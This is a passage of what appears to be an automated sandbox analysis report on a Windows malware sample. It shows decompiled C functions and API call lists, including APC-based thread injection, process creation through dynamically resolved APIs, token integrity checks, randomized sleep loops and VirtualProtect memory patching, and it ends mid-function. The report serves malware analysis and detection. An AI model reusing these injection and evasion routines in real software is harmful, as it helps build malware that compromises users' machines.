					_t18 = _t47 + 0xb0e3b3; // 0x73797325
					_t68 = E00B02291(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0xb0d2e0; // 0xdca5a8
						_t19 = _t50 + 0xb0e760; // 0x18d8d08
						_t20 = _t50 + 0xb0e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00B034C7();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E00B034C7();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xb0d270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E00B04AAB(_t70);
				goto L12;
			}

0x00b01008
0x00b01008
0x00b01017
0x00b0101e
0x00b01023
0x00b01130
0x00b01137
0x00b01137
0x00b01032
0x00b0103a
0x00b0103d
0x00b01042
0x00b01057
0x00b0105d
0x00b0105e
0x00b01061
0x00b01067
0x00b0106a
0x00b0106f
0x00b01077
0x00b01083
0x00b01087
0x00b01117
0x00b0108d
0x00b0108d
0x00b01092
0x00b01099
0x00b010ad
0x00b010b1
0x00b01100
0x00b010b3
0x00b010b4
0x00b010bb
0x00b010d4
0x00b010d6
0x00b010da
0x00b010e1
0x00b010fb
0x00b010e3
0x00b010ec
0x00b010f1
0x00b010f1
0x00b010e1
0x00b0110f
0x00b0110f
0x00b01087
0x00b0111e
0x00b01127
0x00b0112b
0x00000000

APIs

Part of subcall function 00B04837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00B0101C,?,00000001,?,?,00000000,00000000), ref: 00B0485C
Part of subcall function 00B04837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00B0487E
Part of subcall function 00B04837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00B04894
Part of subcall function 00B04837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00B048AA
Part of subcall function 00B04837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00B048C0
Part of subcall function 00B04837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00B048D6

memset.NTDLL ref: 00B0106A

Part of subcall function 00B02291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00B01083,73797325), ref: 00B022A2
Part of subcall function 00B02291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00B022BC

GetModuleHandleA.KERNEL32(4E52454B,018D8D08,73797325), ref: 00B010A0
GetProcAddress.KERNEL32(00000000), ref: 00B010A7
HeapFree.KERNEL32(00000000,00000000), ref: 00B0110F

Part of subcall function 00B034C7: GetProcAddress.KERNEL32(36776F57,00B05B13), ref: 00B034E2

CloseHandle.KERNEL32(00000000,00000001), ref: 00B010EC
CloseHandle.KERNEL32(?), ref: 00B010F1
GetLastError.KERNEL32(00000001), ref: 00B010F5

Strings

@MtNt, xrefs: 00B010F5
Ut, xrefs: 00B0110F

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID: Ut$@MtNt
API String ID: 3075724336-969920318
Opcode ID: b3fd130c7210aac85dc541f14b84c8c17966e4f8304b85f76c1ec5d9663bf569
Instruction ID: 2e082ec727ee2a23f3b804afffb91bb21bc8972a593b7b4770ecf0995eaa114e
Opcode Fuzzy Hash: b3fd130c7210aac85dc541f14b84c8c17966e4f8304b85f76c1ec5d9663bf569
Instruction Fuzzy Hash: 3E3141B6900208AFDB15AFE4CC89D9EBFFCEB08344F1448A5F605A71A1DB70AE44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B56C25, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000,?,00B5B788,00000000,00000001,?,00000000,00000000,00000000,00B80964,00000001), ref: 00B56C73
VirtualProtect.KERNELBASE(00000000,00000000,00000040,00000200,?,00000000,?,00B5B788,00000000,00000001,?,00000000,00000000,00000000,00B80964,00000001), ref: 00B56C85
lstrcpy.KERNEL32(00000000,?), ref: 00B56C94
VirtualProtect.KERNELBASE(00000000,00000000,00000200,00000200,?,00000000,?,00B5B788,00000000,00000001,?,00000000,00000000,00000000,00B80964,00000001), ref: 00B56CA5
VirtualProtect.KERNELBASE(?,00000005,00000040,00000400,00B7D510,00000018,00B5614C,?,00000000,?,00B5B788,00000000,00000001,?,00000000,00000000), ref: 00B56CDC
VirtualProtect.KERNELBASE(?,00000004,?,?,?,00000000,?,00B5B788,00000000,00000001,?,00000000,00000000,00000000,00B80964,00000001), ref: 00B56CF7
VirtualProtect.KERNEL32(?,00000004,00000040,?,00B7D510,00000018,00B5614C,?,00000000,?,00B5B788,00000000,00000001,?,00000000,00000000), ref: 00B56D0C
VirtualProtect.KERNELBASE(?,00000004,00000040,?,00B7D510,00000018,00B5614C,?,00000000,?,00B5B788,00000000,00000001,?,00000000,00000000), ref: 00B56D39
VirtualProtect.KERNELBASE(?,00000004,?,?,?,00000000,?,00B5B788,00000000,00000001,?,00000000,00000000,00000000,00B80964,00000001), ref: 00B56D53
GetLastError.KERNEL32(?,00000000,?,00B5B788,00000000,00000001,?,00000000,00000000,00000000,00B80964,00000001), ref: 00B56D5A

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
String ID:
API String ID: 3676034644-0
Opcode ID: 8ed3adbb69682f15eea2511d1d70aac43f905aec31a69a4fd2eae7dc58b44761
Instruction ID: 66ee52f9555ea00a7b3e00f2c760968da36b4bd029f88525c424f41ffefc40c3
Opcode Fuzzy Hash: 8ed3adbb69682f15eea2511d1d70aac43f905aec31a69a4fd2eae7dc58b44761
Instruction Fuzzy Hash: 08411F71500709AFDB219F64CC44F6AB7F5FB08311F4085A9EA56A75A0DB35E909DF20

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1B59, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e1a4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e1a418c;
						if( *0x6e1a418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e1a4198;
								if( *0x6e1a4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e1a418c);
						}
						HeapDestroy( *0x6e1a4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e1a4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6e1a4190 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e1a41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E1A153C(E6E1A1719, E6E1A1C35(_a12, 1, 0x6e1a4198, _t41));
							 *0x6e1a418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6e1a1b5c
0x6e1a1b68
0x6e1a1b6a
0x6e1a1b6d
0x6e1a1be3
0x6e1a1be9
0x6e1a1beb
0x6e1a1bed
0x6e1a1bf3
0x6e1a1bf5
0x6e1a1bfa
0x6e1a1bfd
0x6e1a1c08
0x6e1a1c0a
0x00000000
0x00000000
0x6e1a1c0c
0x6e1a1c0f
0x6e1a1c11
0x00000000
0x00000000
0x00000000
0x6e1a1c11
0x6e1a1c19
0x6e1a1c19
0x6e1a1c25
0x6e1a1c25
0x6e1a1b6f
0x6e1a1b70
0x6e1a1b90
0x6e1a1b96
0x6e1a1b9b
0x6e1a1b9d
0x6e1a1bd9
0x6e1a1bd9
0x6e1a1b9f
0x6e1a1ba7
0x6e1a1bae
0x6e1a1bb8
0x6e1a1bc4
0x6e1a1bc9
0x6e1a1bd0
0x6e1a1bd5
0x00000000
0x6e1a1bd5
0x6e1a1bd0
0x6e1a1b9d
0x6e1a1b70
0x6e1a1c32

APIs

InterlockedIncrement.KERNEL32(6E1A4188), ref: 6E1A1B7B
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1A1B90

Part of subcall function 6E1A153C: CreateThread.KERNELBASE ref: 6E1A1553
Part of subcall function 6E1A153C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1A1568
Part of subcall function 6E1A153C: GetLastError.KERNEL32(00000000), ref: 6E1A1573
Part of subcall function 6E1A153C: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1A157D
Part of subcall function 6E1A153C: CloseHandle.KERNEL32(00000000), ref: 6E1A1584
Part of subcall function 6E1A153C: SetLastError.KERNEL32(00000000), ref: 6E1A158D

InterlockedDecrement.KERNEL32(6E1A4188), ref: 6E1A1BE3
SleepEx.KERNEL32(00000064,00000001), ref: 6E1A1BFD
CloseHandle.KERNEL32 ref: 6E1A1C19
HeapDestroy.KERNEL32 ref: 6E1A1C25

Strings

Tt, xrefs: 6E1A1B90

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID: Tt
API String ID: 2110400756-3291821022
Opcode ID: 52a63596837c77a7e56fc474438092fda55a632247e592b0549e3ce0fbedf5c2
Instruction ID: 110c2c2132bb482750efe0d8a35972768486c0cf17d4f688f79c86c72cddd2b4
Opcode Fuzzy Hash: 52a63596837c77a7e56fc474438092fda55a632247e592b0549e3ce0fbedf5c2
Instruction Fuzzy Hash: 222193B9700615EFDB00AFEDCD48A7E7BB8F7663607518825E706D3144EB30998ABB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B0262F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 61
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00B0262F(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0xb0d270 = _t10;
				if(_t10 != 0) {
					 *0xb0d160 = GetTickCount();
					_t12 = E00B01A24(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L00B0B02E();
							_t34 = _t14 + _t16;
							_t18 = E00B04F23(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E00B027C7(_t26) != 0) {
							 *0xb0d298 = 1; // executed
						}
						_t12 = E00B0520D(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x00b0262f
0x00b02635
0x00b02636
0x00b02642
0x00b02648
0x00b0264f
0x00b0265f
0x00b02664
0x00b0266b
0x00b0266d
0x00b02672
0x00b02678
0x00b0267e
0x00b02688
0x00b0268c
0x00b0268e
0x00b02693
0x00b02694
0x00b02695
0x00b0269a
0x00b026a0
0x00b026ab
0x00b026ac
0x00b026b2
0x00b026b8
0x00b026c4
0x00b026c6
0x00b026c6
0x00b026d0
0x00b026d0
0x00b02651
0x00b02653
0x00b02653
0x00b026da

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00B01900,?), ref: 00B02642
GetTickCount.KERNEL32 ref: 00B02656
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00B01900,?), ref: 00B02672
SwitchToThread.KERNEL32(?,00000001,?,?,?,00B01900,?), ref: 00B02678
_aullrem.NTDLL(?,?,00000013,00000000), ref: 00B02695
Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,00B01900,?), ref: 00B026B2

Strings

uj, xrefs: 00B0265F

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID: uj
API String ID: 507476733-3505891419
Opcode ID: 81103f595f034295cec94b0f5a52804ff3ed86d103fe711f6709605cc733e3b9
Instruction ID: a60938e1cb390058cf10aff72d7ee27055e49733a29e9b364362375900c86688
Opcode Fuzzy Hash: 81103f595f034295cec94b0f5a52804ff3ed86d103fe711f6709605cc733e3b9
Instruction Fuzzy Hash: 9211C272A40204ABD7206BB4DC0EF5A7EE8EB58350F100269FA15D72D0FFB1D844CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A153C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A153C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1a41c0, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6e1a1553
0x6e1a1559
0x6e1a155d
0x6e1a1568
0x6e1a1570
0x6e1a1579
0x6e1a157d
0x6e1a1584
0x6e1a158b
0x6e1a158d
0x6e1a1593
0x6e1a1570
0x6e1a1597

APIs

CreateThread.KERNELBASE ref: 6E1A1553
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1A1568
GetLastError.KERNEL32(00000000), ref: 6E1A1573
TerminateThread.KERNEL32(00000000,00000000), ref: 6E1A157D
CloseHandle.KERNEL32(00000000), ref: 6E1A1584
SetLastError.KERNEL32(00000000), ref: 6E1A158D

Strings

@Mt MtTt, xrefs: 6E1A1573

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID: @Mt MtTt
API String ID: 3832013932-608512568
Opcode ID: 93c7177958c39ae96ddfb3e4b7d807d3377c5b8afaa3e6d8c13af1f1d6aa6564
Instruction ID: 812fb38d0bfec62f54c9b404c9531249a84397093841eb267e6ad8461a883e09
Opcode Fuzzy Hash: 93c7177958c39ae96ddfb3e4b7d807d3377c5b8afaa3e6d8c13af1f1d6aa6564
Instruction Fuzzy Hash: 4FF08C76204E20BBDB122BA89E0CFBFBFA9FB0B751F008504F70990040C7218806ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B5D814, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B645D7: GetProcAddress.KERNEL32(?,00000318), ref: 00B645FC
Part of subcall function 00B645D7: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00B64618

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00B5D84D
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00B5D938

Part of subcall function 00B645D7: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 00B64782

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00B5D883
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B5D88F
lstrcmpi.KERNEL32(?,00000000), ref: 00B5D8CC
StrChrA.SHLWAPI(?,0000002E), ref: 00B5D8D5
lstrcmpi.KERNEL32(?,00000000), ref: 00B5D8E7

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
String ID:
API String ID: 3901270786-0
Opcode ID: f3e5446d1ee08d8967ec4f8cccfb20ac18930ba8098976195555a675d5033a64
Instruction ID: 0bce281c077ff8ff7da63dae3b881c5d5ebf4d124cc49c1d8ba4055a1d980c3c
Opcode Fuzzy Hash: f3e5446d1ee08d8967ec4f8cccfb20ac18930ba8098976195555a675d5033a64
Instruction Fuzzy Hash: FE318D71505315ABD3319F11DC44F6BBBE8FF88B55F100A99F988A7280D734E948CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00B766CF, Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00B60A77: memset.NTDLL ref: 00B60A81

OpenEventA.KERNEL32(00000002,00000000,00B81354,?,00000000,00000000,?,00B5B0CC,?,?,?,?,?,?,?,00B577C7), ref: 00B76769
SetEvent.KERNEL32(00000000,?,00B5B0CC,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B76776
Sleep.KERNEL32(00000BB8,?,00B5B0CC,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B76781
ResetEvent.KERNEL32(00000000,?,00B5B0CC,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B76788
CloseHandle.KERNEL32(00000000,?,00B5B0CC,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B7678F
GetShellWindow.USER32 ref: 00B7679A
GetWindowThreadProcessId.USER32(00000000), ref: 00B767A1

Part of subcall function 00B53F26: RegCloseKey.ADVAPI32(?,?,?), ref: 00B53FA9

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
String ID:
API String ID: 53838381-0
Opcode ID: bc72adfcf1b6f5f38c72fc6399793ece3b66912d941d1ffa4cad898a5f94a012
Instruction ID: b99bba1acd37abf5bfe279eceadb761899a098b4156741b6053b06bb912e0e5a
Opcode Fuzzy Hash: bc72adfcf1b6f5f38c72fc6399793ece3b66912d941d1ffa4cad898a5f94a012
Instruction Fuzzy Hash: 1C218636201610BBC2247BA99C49F6B7BEDEBC8B95B148584F92D97171EF349C02CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B04151, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B04151(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xb0d294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00B075F6(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00B04AAB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00b0415e
0x00b04165
0x00b0416c
0x00b04180
0x00b0418b
0x00b041a3
0x00b041b0
0x00b041b3
0x00b041b8
0x00b041c3
0x00b041c7
0x00b041d6
0x00b041da
0x00b041f6
0x00b041f6
0x00b041fa
0x00b041fa
0x00b041ff
0x00b04203
0x00b04209
0x00b0420a
0x00b04211
0x00b04217

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00B04183
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00B041A3
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00B041B3
CloseHandle.KERNEL32(00000000), ref: 00B04203

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00B041D6
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00B041DE
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00B041EE

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 765008737bacda43b6b8f3ea6998dc157685dccc06820c24e89c7b9d69c27550
Instruction ID: ec61e14010369f90494857d45fe4b8e90058d0bac024443c7bc1820f0e132d52
Opcode Fuzzy Hash: 765008737bacda43b6b8f3ea6998dc157685dccc06820c24e89c7b9d69c27550
Instruction Fuzzy Hash: F3213CB5900209FFEB11AF94DC44EEEBFB9EB58304F1040A5FA10A71A1DB719E45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B01A9C, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0A6A0: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,018D89D4,00B01ACA,?,?,?,?,?,?,?,?,?,?,?,00B01ACA), ref: 00B0A76D

Part of subcall function 00B039D5: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00B03A12
Part of subcall function 00B039D5: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00B03A43

SysAllocString.OLEAUT32(00000000), ref: 00B01AF6
SysAllocString.OLEAUT32(0070006F), ref: 00B01B0A
SysAllocString.OLEAUT32(00000000), ref: 00B01B1C
SysFreeString.OLEAUT32(00000000), ref: 00B01B84
SysFreeString.OLEAUT32(00000000), ref: 00B01B93
SysFreeString.OLEAUT32(00000000), ref: 00B01B9E

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
String ID:
API String ID: 2831207796-0
Opcode ID: 2a8695ebdc6490acd5e2e94184d59980f49dc3dd1d9c53c9b04809b4fcb24bee
Instruction ID: ea12059835df53a06655ed8a4eb6cbe597eb98b87078cd91c19a9f07b07a9f78
Opcode Fuzzy Hash: 2a8695ebdc6490acd5e2e94184d59980f49dc3dd1d9c53c9b04809b4fcb24bee
Instruction Fuzzy Hash: 40415E36900609ABDB01DFBCD844A9EBBB9EF49310F1444A6E915EB260EB719D05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B6F8B8, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B6F8DB

Part of subcall function 00B5407F: GetModuleHandleA.KERNEL32(?), ref: 00B540A0
Part of subcall function 00B5407F: GetProcAddress.KERNEL32(00000000,?), ref: 00B540B9
Part of subcall function 00B5407F: OpenProcess.KERNEL32(00000400,00000000,?), ref: 00B540D6
Part of subcall function 00B5407F: IsWow64Process.KERNEL32(?,?), ref: 00B540E7
Part of subcall function 00B5407F: CloseHandle.KERNEL32(?,?,?), ref: 00B540FA

ResumeThread.KERNEL32(?,?,00000000,00000000,00000004,?,00000000,74E04EE0,00000000), ref: 00B6F995
WaitForSingleObject.KERNEL32(00000064), ref: 00B6F9A3
SuspendThread.KERNEL32(?), ref: 00B6F9B6

Part of subcall function 00B6C0B6: memset.NTDLL ref: 00B6C380

ResumeThread.KERNELBASE(?), ref: 00B6FA39

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Thread$HandleProcessResumememset$AddressCloseModuleObjectOpenProcSingleSuspendWaitWow64
String ID:
API String ID: 223543837-0
Opcode ID: 881da171a036923d5b4be96bde4f9c8c1bc1b4ca71bb293b9911f9acaafa1c6e
Instruction ID: 8a2b0bcbf0a7ad256f8846c931239e96c5ddc0be481873f8c92e39225367687c
Opcode Fuzzy Hash: 881da171a036923d5b4be96bde4f9c8c1bc1b4ca71bb293b9911f9acaafa1c6e
Instruction Fuzzy Hash: F6415972A0020AABDB119FA4EC85AAE7BF9EB04304F1444B5F919A7160DB39DE95CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B77862, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00B6A538,?,?,00000402,00B6A538,00B7D590,00000018,00B68D57,?,00000402,00B807F4,00B807F0,-0000000C,00000000), ref: 00B778A5
VirtualProtect.KERNELBASE(00000000,00000004,00B6A538,00B6A538,00000000,00000004,00B6A538,00B807F4,00B6A538,?,?,00000402,00B6A538,00B7D590,00000018,00B68D57), ref: 00B77930
RtlEnterCriticalSection.NTDLL(00B81460), ref: 00B77959
RtlLeaveCriticalSection.NTDLL(00B81460), ref: 00B77977

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: 7f2d2a1e3ba197f1ef67e9fbb070ac4bb008ac1fe93a289899248b10c3710498
Instruction ID: 86352b7a8d0a796abd20e9ae707b70593903b4dd4547fc0d41436bf1ed404454
Opcode Fuzzy Hash: 7f2d2a1e3ba197f1ef67e9fbb070ac4bb008ac1fe93a289899248b10c3710498
Instruction Fuzzy Hash: F7415C70900705EFCB11DF65C884AAEBBF5FF48300B14859AE529E7260DB74EA51CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A19C2, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A19C2(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E1A1000(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
